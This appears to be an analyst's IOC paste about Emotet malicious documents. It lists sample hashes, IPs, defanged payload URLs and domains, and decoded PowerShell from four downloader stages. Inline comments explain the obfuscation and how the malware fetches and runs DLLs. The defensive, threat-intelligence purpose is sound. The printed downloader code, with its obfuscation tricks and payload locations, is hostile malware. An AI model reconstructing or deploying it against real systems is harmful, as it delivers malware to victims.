paladin316

Emotet_Doc_out_2021-01-05_14_34.txt

Jan 5th, 2021
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (maldoc samples; several hashes are listed twice -- deduplicate before loading into a blocklist):
  4. c32677479dab9138f3439c5a09f0d9b0a707b3aa71ccda84c297c2c0f5fad452
  5. c03e40496eab8a1a6a0fa4220d0be3dbcee83db644a0d1b2cbdf53e80882da14
  6. dc5ca596e8b79ce0402bc63258f8494a2e836700dedb32153708f7bc711e3fb4
  7. dc5ca596e8b79ce0402bc63258f8494a2e836700dedb32153708f7bc711e3fb4
  8. eee737a863a8bf2e4daaadc6445f779455582be07f1ba36c84a0bd27f5ad6751
  9. eee737a863a8bf2e4daaadc6445f779455582be07f1ba36c84a0bd27f5ad6751
  10. 79ec7021a000940cb40f6c4779aaf2cee64001b113a331794268252115a6c44d
  11. 8a19fbc6a3bc08b9dd72d27bc8dbfb51401577914081abe961ab64ee67128d46
  12. 40977b89d6a6667e3e77e68d8a87500fb5461c61c6aaab7355550246e0f03cd6
  13. 40977b89d6a6667e3e77e68d8a87500fb5461c61c6aaab7355550246e0f03cd6
  14. 436ca025416de5f2e4b98d6112bdcf6677f2c9398b8c7a2e1e644a5717916014
  15. 436ca025416de5f2e4b98d6112bdcf6677f2c9398b8c7a2e1e644a5717916014
  16. eaa2a7a6ead0fb817d96de5539291d86caf887cbba94836c246755105a7a1429
  17. 706a19b0ff78fefb6808c5832c447d9a8283c62cc1ecbe98c8080d1cbba8b881
  18. 706a19b0ff78fefb6808c5832c447d9a8283c62cc1ecbe98c8080d1cbba8b881
  19. 41505a0b842a66d3fef94c776b368f11070d50c212c541fc50c51e7624b63bc5
  20. 49a4678f9b33879cb16662dd5d05bc7e7ec713bbf6a85741a81f9e1e0f3c37f4
  21. 49a4678f9b33879cb16662dd5d05bc7e7ec713bbf6a85741a81f9e1e0f3c37f4
  22. a4aad5f9fbf0297950767fdd56e60306ddd25957d0f787ab3400f0b089edf97f
  23. a4aad5f9fbf0297950767fdd56e60306ddd25957d0f787ab3400f0b089edf97f
  24. 9f2a4217ac7bc2203e15e509f3fca89596b2cf721e858100103c8f967d39b612
  25. 9f2a4217ac7bc2203e15e509f3fca89596b2cf721e858100103c8f967d39b612
  26. 3d566983c8d1eebeb69ceafa423e493e04f3ca7fa686084e2c2e064a363a9d07
  27. b10a960e8977a7b70533cbee4eb85803cde6da3e96f6b83f3ed90e1950ca002a
  28. bd71cb5216319d67b7163d101b227e46c1b8172480c96aee9172be8670c32fbf
  29. a5510a203c4d4cc423b2e4a321e9e2fd2a9b9afa62195780841d60cda74614af
  30. 3403d31e29a2e9774675378eb335947934b2411cd2ef123125f70310e6a7308c
  31. bf2f59ecb85a6029a908bdf90f5dae875e68196bf1987cf72959bd568355c702
  32. 3a7192ae0a86e22de203cd0bd9c3b2ddae45e918207d4ad84f4cfe6b1d975c95
  33. 269b7e9055041b22adcfd3f3d1d0a4711292eb08c8674a535071c2ccf27a31fd
  34. 328547d8fbddaf5087390a97bb4bd2032672e5ebda3e6c867bb5093cde59cb5d
  35. 7ab531ffdf05ec65c076a06ea4a7e92a3c02ccb479f866db344d9fc4abcad342
  36. 38d17dfd9fc5d7eb04a6ed019750022081fd13b253d0eb08d92fd9109815ec52
  37. e1ebbd14ee5b8c0e8f24ab2f32d70806cbad49852e703793b4235d8117dbf439
  38. c909996e11aabb6f9003b0ca2e0e52d58c16777e4c7e6fc11aa6b599183dd7d4
  39. f24de274099a159067700e313a638da70fcc4b38008d7315f5723181d0724427
  40. 771ac1b506fa360b405de6d3b6947b0fa3e32159b35dc852efaf0eabf8cf6b75
  41. 67b7c7f217354619c0ddaa92803967254a88e680d52aafbf813d0884bf2bcfd8
  42. 403df2e81bbb1cbe0b761a68962a96d99082642fb0f7764a1f7ea057c7854988
  43. 6aa8822f97a4b8c6f94cfea8ac81f0deffe57554498a897a22930d98366a5599
  44. eea58b2b0043981ad90b971ebe83901ebcefceda806a25b6eaf21408b3d3a689
  45. fa91514bcf7bf7d49942a9540a1d515095c09cd936dae7f0073647dff6249c37
  46. 555882aa0c70bf9f62ae71584a9e5e18353d6126de19390f8c2859c15693764c
  47. a26ff62a2264180c03ebf68a26120cadbcee3f53a4cc6dc7ad00d97ffd029c85
  48. 7e02cee4970608058fda2b43e61217bcf29977b2f2339fc77ba5be871de1b130
  49. c11b3260b89105272c919fd8e27cdbb61559283ffaf6b0da431de10d27887125
  50. 8b925011335a9296e315e7b64f267020ce33b7ba7c00ea8c859f9ef911c9752f
  51. 51f14ae7f8e54c7fe9572f8c9d28a8a6b793d85fdbd72b56d4233db93efacae9
  52. 51f14ae7f8e54c7fe9572f8c9d28a8a6b793d85fdbd72b56d4233db93efacae9
  53. 9be359c8e7dd9a3b5b245175a6f8dd0f06a45a9bacd216edd933572ca6fa3d52
  54. 9be359c8e7dd9a3b5b245175a6f8dd0f06a45a9bacd216edd933572ca6fa3d52
  55. 6f6017ad7e5d7a0a299caa7fc8a14d5a24383f81dc09f9c0dd571c9473af020f
  56. 6f6017ad7e5d7a0a299caa7fc8a14d5a24383f81dc09f9c0dd571c9473af020f
  57. bc31710591f55e8f19e5d9a0832dbac8685e577da94f44cb7efab1e17c730c09
  58. c117ee4b0325e948b2914fc8b400782b97cd6409b0b6ff7663abcbe03bcd02b6
  59. c117ee4b0325e948b2914fc8b400782b97cd6409b0b6ff7663abcbe03bcd02b6
  60. 61b7b67766e528b2fb8bfaca8a4ee64bac2adce1d1160d5c52b84e131b9e8734
  61. c4d979622647bc179ca385e15044d1a3d71643013b1413a46fe06f20bcd3ef44
  62. c4d979622647bc179ca385e15044d1a3d71643013b1413a46fe06f20bcd3ef44
  63. cf35df1d400868df50e48cf53807db3c941a7fa5f4fbd210becb87acd8bc72e6
  64. cf35df1d400868df50e48cf53807db3c941a7fa5f4fbd210becb87acd8bc72e6
  65. 79251159b9f14e17f66f0206b07ac7a9a696a3dd9e56aed33ef245bc1f28c6eb
  66. 01bce41750258f3d232b9eb7fe7901a88167254f0fe956f557bb33aced7cfec5
  67. 001e1ea7ab07c91d781f5c51cd2039efc3acaf9f3a7b4bad38979ad48ad2119c
  68. 59a5bd5a89cb04636e5146b6637154636d8e608014dba50b76e584d9dbfeebee
  69.  
  70.  
  71. IPs (appear to be resolutions of the domains below at collection time; several sit in shared CDN/cloud ranges -- e.g. 104.28.x.x and 172.67.x.x are Cloudflare -- so IP-level blocking carries a high false-positive risk; prefer the URL/domain indicators):
  72. 103.237.147.16
  73. 104.28.2.144
  74. 104.28.3.144
  75. 162.241.148.243
  76. 172.67.189.241
  77. 173.254.250.226
  78. 191.6.212.159
  79. 202.92.7.113
  80. 210.56.52.6
  81. 35.214.199.246
  82. 40.119.6.228
  83. 72.167.241.46
  84. 90.160.138.175
  85.  
  86.  
  87.  
  88. URLs (Emotet payload download locations, defanged with hxxp; the wp-content/wp-admin/cgi-bin paths suggest compromised legitimate sites, so expect them to be cleaned up quickly -- the full path is the most specific indicator):
  89. hxxps://slimfitcaps.com/wp-content/iLkG5/
  90. hxxp://singaedental.vn/wp-content/lQ/
  91. hxxp://izitienda.com/content/h9b/
  92. hxxp://frontechonline.com/downloads/D/
  93. hxxp://contactscorporation.com/wp-content/W3/
  94. hxxps://indopakgroceries.com/cgi-bin/S/
  95. hxxp://complianceceo.com/wp-content/OX/
  96. hxxps://fathekarim.com/images/jiC/
  97. hxxps://trumpcommunity.com/usa-no-uykjh/wcS/
  98. hxxps://comunicacaovertical.com.br/agencia/D0sJl/
  99. hxxp://datawyse.net/5VGI0/
  100. hxxp://transfersuvan.com/wp-admin/1114R/
  101. hxxp://upafrique.com/cgi-bin/iFmg/
  102. hxxps://radioclype.scola.ac-paris.fr/wp-admin/js/widgets/6S/
  103. hxxps://admintk.com/wp-admin/L/
  104. hxxps://mikegeerinck.com/c/YYsa/
  105. hxxp://freelancerwebdesignerhyderabad.com/cgi-bin/S/
  106. hxxp://etdog.com/wp-content/nu/
  107. hxxps://www.hintup.com.br/wp-content/dE/
  108. hxxp://www.stmarouns.nsw.edu.au/paypal/b8G/
  109. hxxp://wm.mcdevelop.net/content/6F2gd/
  110. hxxp://etbnaman.com/wp-admin/V0Sv/
  111. hxxp://spovahealth.com/z/Vb/
  112. hxxp://youyouwj.com/b/HW/
  113. hxxp://labasedespatriotes.net/wp-content/tGjE/
  114. hxxp://anakhita.com/wordpress/Pt/
  115. hxxp://ezdesigns.net/ALFA_DATA/h/
  116. hxxp://menol.eu/wp/mT/
  117.  
  118.  
  119. Domains (hosts of the URLs above; most look like compromised legitimate sites, including school/education hosts, so weigh collateral impact before domain-level blocking):
  120. slimfitcaps.com
  121. singaedental.vn
  122. izitienda.com
  123. frontechonline.com
  124. contactscorporation.com
  125. indopakgroceries.com
  126. complianceceo.com
  127. fathekarim.com
  128. trumpcommunity.com
  129. comunicacaovertical.com.br
  130. datawyse.net
  131. transfersuvan.com
  132. upafrique.com
  133. radioclype.scola.ac-paris.fr
  134. admintk.com
  135. mikegeerinck.com
  136. freelancerwebdesignerhyderabad.com
  137. etdog.com
  138. www.hintup.com.br
  139. www.stmarouns.nsw.edu.au
  140. wm.mcdevelop.net
  141. etbnaman.com
  142. spovahealth.com
  143. youyouwj.com
  144. labasedespatriotes.net
  145. anakhita.com
  146. ezdesigns.net
  147. menol.eu
  148.  
  149.  
  150. Decoded Base64 PowerShell (four downloader stages concatenated; quotes and parentheses were lost in decoding, URLs are defanged with hxxp, and the garbled byte runs between stages are decoder residue -- not runnable, for analysis only):
  # NOTE(review): decoded Emotet maldoc PowerShell. Four near-identical downloader
  # stages are concatenated here; the leading "1..." bytes and the "<�?�^,�]z"
  # runs between stages are decoder residue, not script text. Quotes and
  # parentheses were lost in decoding and the URLs are defanged (hxxp), so this
  # text is NOT runnable -- it is kept for analysis only.
  # The obfuscation visible below is string-level only: backtick-split method
  # names ("CrE`ATedI`REcto`RY" == CreateDirectory) and [Type]"{n}..." -f format
  # strings that assemble .NET type names. The $Xnnn=Yyyy one-liners between
  # statements are never referenced again and are filler.
  # Per stage the behaviour is: resolve System.IO.Directory and
  # System.Net.ServicePointManager; set $ErrorActionPreference to
  # SilentlyContinue; create a two-level directory under $HOME; force TLS 1.2;
  # for each URL in a list, download to $HOME\<dir>\<dir>\<name>.dll with
  # System.Net.WebClient.DownloadFile; if the file is at least N bytes (N differs
  # per stage: 48192, 37293, 35698, 47015) launch it with
  # rundll32 <path>,Control_RunDLL and break; every failure is swallowed by
  # catch{} so the next URL is tried.
  # Detection hooks visible here: powershell.exe instantiating
  # System.Net.WebClient and writing a .dll under the user profile, followed by
  # rundll32.exe loading a user-profile DLL via the Control_RunDLL export. The
  # parent process (the maldoc) is not shown in this dump.
  # Stage 1. $jSfA5 resolves to "SySTEM.iO.DIReCToRy" once the format string is applied.
  151. 1��>��^�>��^�<�?�^,�]z sv "J""Sfa5" [TyPe]"{3}{1}{0}{2}{4}{5}" -FO,sTEM.i,.DI,Sy,R,eCToRy ;
  # $zPN1A resolves to "sysTeM.neT.SERVicEpOIntMAnAgEr".
  152. sv "z""PN1A" [tYPe]"{2}{1}{6}{4}{0}{5}{3}{7}" -f icEpO,eM.neT,sysT,MAn,V,Int,.SER,AgEr ;
  153. $ErrorActionPreference = SilentlyContinue;
  # Delimiter used later to split the URL list; [char]64 is '@'. $D0_C and $N6_H
  # were most likely string literals whose quotes were lost in decoding.
  154. $Sjgbbc0=$D0_C [char]64 $N6_H;
  155. $E62Z=O31M;
  # CreateDirectory($HOME\Mo_vgtd\A13oj_s): the XOk token is replaced by [char]92 ('\').
  156. $jSfA5::"CrE`ATedI`REcto`RY"$HOME XOkMo_vgtdXOkA13oj_sXOk -crepLACe XOk,[cHar]92;
  157. $J25P=E6_S;
  # ServicePointManager.SecurityProtocol = Tls12 (needed for the hxxps URLs below).
  158. Gci vARiABLe:ZpN1a .ValUE::"s`E`cu`RITYpro`TOCoL" = Tls12;
  159. $A99M=E20R;
  160. $D4zszrc = Y14K;
  161. $Q41X=E36T;
  # Drop path: $HOME\Mo_vgtd\A13oj_s\Y14K.dll (wEq -> '\').
  162. $Qh40emz=$HOMEwEqMo_vgtdwEqA13oj_swEq."r`epl`Ace"wEq,\$D4zszrc.dll;
  163. $A64J=A63Q;
  # URL list. The trailing .replace/.split on line 170 appears to re-expand the
  # scheme placeholders (the analyst's hxxp defanging has altered that expression)
  # and then splits on the '@' delimiter built on line 154.
  164. $B5pc73a=hxxps://slimfitcaps.com/wp-content/iLkG5/
  165. hxxp://singaedental.vn/wp-content/lQ/
  166. hxxp://izitienda.com/content/h9b/
  167. hxxp://frontechonline.com/downloads/D/
  168. hxxp://contactscorporation.com/wp-content/W3/
  169. hxxps://indopakgroceries.com/cgi-bin/S/
  170. hxxp://complianceceo.com/wp-content/OX/."r`E`PLACe"hxxp,[array]sd,sw,hxxp,3d[1]."sp`lit"$L88A $Sjgbbc0 $L55O;
  171. $H9_G=V51M;
  # Download loop: WebClient.DownloadFile(url, dropPath); any exception is swallowed by catch{}.
  172. foreach $Kma71ma in $B5pc73a{try{.New-Object sySteM.nEt.WeBclienT."dOWN`L`Oa`Dfile"$Kma71ma, $Qh40emz;
  173. $U3_D=R96T;
  # Size gate (>= 48192 bytes) before rundll32 <dropPath>,Control_RunDLL --
  # presumably to skip error pages and truncated responses.
  174. If &Get-Item $Qh40emz."L`EN`gTH" -ge 48192 {&rundll32 $Qh40emz,Control_RunDLL."toSt`R`INg";
  175. $V88Y=R14T;
  # First successful download and launch ends the loop.
  176. break;
  # Stage 1 closes with }}catch{}} ; after the residue, stage 2 starts on the same
  # line. Same logic: directory $HOME\Shfku8t\Wnwspx3, DLL A1_H.dll, size gate 37293.
  177. $V__A=N14C}}catch{}}$K92Y=S62Y<�?�^,�]z set-ITEm vARiAblE:CgIja [tYpe]"{1}{0}{3}{2}"-f tE,sys,iO.dIreCTorY,m. ;
  # $7jaD resolves to System.Net.ServicePointManager.
  178. $7jaD= [TypE]"{2}{3}{0}{4}{6}{1}{5}" -fc,nTManAge,sySTE,M.neT.sERvI,ePo,R,I;
  179. $ErrorActionPreference = SilentlyContinue;
  180. $Oix5v32=$H73M [char]64 $F22I;
  181. $I59W=J49Z;
  # SIn token -> '\'.
  182. $CGIjA::"CREA`Te`DiRe`CTORY"$HOME SInShfku8tSInWnwspx3SIn -CReplACE SIn,[CHAR]92;
  183. $Q5_Z=T19M;
  184. Get-vARIAblE 7JAd -vaLUEonL ::"sECur`iT`Yp`RotocoL" = Tls12;
  185. $T_6H=A74J;
  186. $Xih8ddp = A1_H;
  187. $C81T=D88C;
  # Here the path separator placeholder is spelled as [CHAr]120[CHAr]51[CHAr]49 ("x31") -> '\'.
  188. $De8163y=$HOMEx31Shfku8tx31Wnwspx3x31 -crePLAce [CHAr]120[CHAr]51[CHAr]49,[CHAr]92$Xih8ddp.dll;
  189. $X73U=E57K;
  190. $D9dez_d=hxxps://fathekarim.com/images/jiC/
  191. hxxps://trumpcommunity.com/usa-no-uykjh/wcS/
  192. hxxps://comunicacaovertical.com.br/agencia/D0sJl/
  193. hxxp://datawyse.net/5VGI0/
  194. hxxp://transfersuvan.com/wp-admin/1114R/
  195. hxxp://upafrique.com/cgi-bin/iFmg/
  196. hxxps://radioclype.scola.ac-paris.fr/wp-admin/js/widgets/6S/."rEpL`A`Ce"hxxp,[array]sd,sw,hxxp,3d[1]."SPl`iT"$K_6H $Oix5v32 $V14L;
  197. $P58K=B1_H;
  198. foreach $F2q6yoz in $D9dez_d{try{.New-Object systEM.nEt.WeBclIeNT."DoWnl`Oa`d`FILE"$F2q6yoz, $De8163y;
  199. $C35O=K46J;
  200. If .Get-Item $De8163y."lE`Ngth" -ge 37293 {.rundll32 $De8163y,Control_RunDLL."TO`sTr`InG";
  201. $K79E=G82K;
  202. break;
  # Stage 3 starts after the residue. Same logic: directory $HOME\Db_bh30\Yf5be5g,
  # DLL A69S.dll, size gate 35698.
  203. $I35D=Y03Z}}catch{}}$L48L=O_7E<�?�^,�]z sEt MKu [TYPe]"{0}{1}{2}{4}{3}" -F SYsT,eM.,io.DI,ORY,rECt ;
  204. SeT-iTEM vaRIabLE:mBu [TYPe]"{6}{8}{0}{3}{4}{5}{2}{7}{1}" -fSteM,Ger,Ma,.n,et.seRVIcepOi,nt,s,NA,Y;
  205. $ErrorActionPreference = SilentlyContinue;
  206. $Cvmmq4o=$Q26L [char]64 $E16H;
  207. $J16J=N_0P;
  # Separator here is a format placeholder: {0} -F [chAR]92.
  208. DIr VariabLE:Mku .VaLUe::"c`REAt`edI`REC`TORy"$HOME {0}Db_bh30{0}Yf5be5g{0} -F [chAR]92;
  209. $C39Y=U68S;
  210. vARiaBLe "m""bu" -VAlueoN ::"sEcuRITYproT`o`c`ol" = Tls12;
  211. $F35I=I4_B;
  212. $Swrp6tc = A69S;
  213. $X27H=C33O;
  214. $Imd1yck=$HOMEUOHDb_bh30UOHYf5be5gUOH."ReP`lACe"UOH,[StrInG][chAr]92$Swrp6tc.dll;
  215. $K47V=R49G;
  216. $B9fhbyv=hxxps://admintk.com/wp-admin/L/
  217. hxxps://mikegeerinck.com/c/YYsa/
  218. hxxp://freelancerwebdesignerhyderabad.com/cgi-bin/S/
  219. hxxp://etdog.com/wp-content/nu/
  220. hxxps://www.hintup.com.br/wp-content/dE/
  221. hxxp://www.stmarouns.nsw.edu.au/paypal/b8G/
  222. hxxp://wm.mcdevelop.net/content/6F2gd/."RE`p`lACe"hxxp,[array]sd,sw,hxxp,3d[1]."s`PLIT"$C83R $Cvmmq4o $F10Q;
  223. $Q52M=P05K;
  224. foreach $Bm5pw6z in $B9fhbyv{try{&New-Object SysTem.nEt.WEBcLIeNT."do`WNl`OaD`FIlE"$Bm5pw6z, $Imd1yck;
  225. $Z10L=A92Q;
  226. If &Get-Item $Imd1yck."len`G`TH" -ge 35698 {&rundll32 $Imd1yck,Control_RunDLL."T`OSt`RiNG";
  227. $R65I=Z09B;
  228. break;
  # Stage 4 starts after the residue. Same logic: directory $HOME\Gh4952x\Ouda02n,
  # DLL E75Y.dll, size gate 47015.
  229. $K7_H=F12U}}catch{}}$W54I=V95O<�?�^,�]z set BY1 [Type]"{0}{1}{3}{5}{4}{2}" -f sYS,tem.,ory,iO.DI,eCT,R ;
  230. Sv snf5 [tyPE]"{5}{2}{0}{4}{7}{6}{8}{3}{1}" -fM.,R,StE,TMaNaGe,n,sY,.SERvIcE,eT,PoIn ;
  231. $ErrorActionPreference = SilentlyContinue;
  232. $Io_k9jz=$D_0U [char]64 $Y13O;
  233. $L79U=S49R;
  # 0xu token -> '\'.
  234. VARiabLE by1 -VAlUeonl ::"cRe`AT`eDIR`eCto`RY"$HOME 0xuGh4952x0xuOuda02n0xu."Re`Pl`Ace"0xu,[String][char]92;
  235. $S10D=M68N;
  236. Get-chIldITEm VaRIAbLe:SNF5 .vALUe::"SE`CUR`iT`YprOTo`cOl" = Tls12;
  237. $Y71Q=A40G;
  238. $Wxrdiwq = E75Y;
  239. $A39I=S32E;
  240. $Z_58os0=$HOME{0}Gh4952x{0}Ouda02n{0}-f [CHar]92$Wxrdiwq.dll;
  241. $C29T=L48D;
  242. $Vcw2pkb=hxxp://etbnaman.com/wp-admin/V0Sv/
  243. hxxp://spovahealth.com/z/Vb/
  244. hxxp://youyouwj.com/b/HW/
  245. hxxp://labasedespatriotes.net/wp-content/tGjE/
  246. hxxp://anakhita.com/wordpress/Pt/
  247. hxxp://ezdesigns.net/ALFA_DATA/h/
  248. hxxp://menol.eu/wp/mT/."rePl`ACe"hxxp,[array]sd,sw,hxxp,3d[1]."sPl`iT"$V72P $Io_k9jz $J56J;
  249. $C80U=H84D;
  250. foreach $U_33a2c in $Vcw2pkb{try{.New-Object sysTEm.Net.WEBCliEnt."d`owNlO`A`dFile"$U_33a2c, $Z_58os0;
  251. $S60A=X72Y;
  252. If &Get-Item $Z_58os0."LEng`TH" -ge 47015 {&rundll32 $Z_58os0,Control_RunDLL."TOS`T`RiNg";
  253. $Y31M=B32A;
  254. break;
  # End of stage 4; everything after T27H on the next line is decoder residue.
  255. $S92N=F_9B}}catch{}}$A65G=T27H���������?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^�
  256.  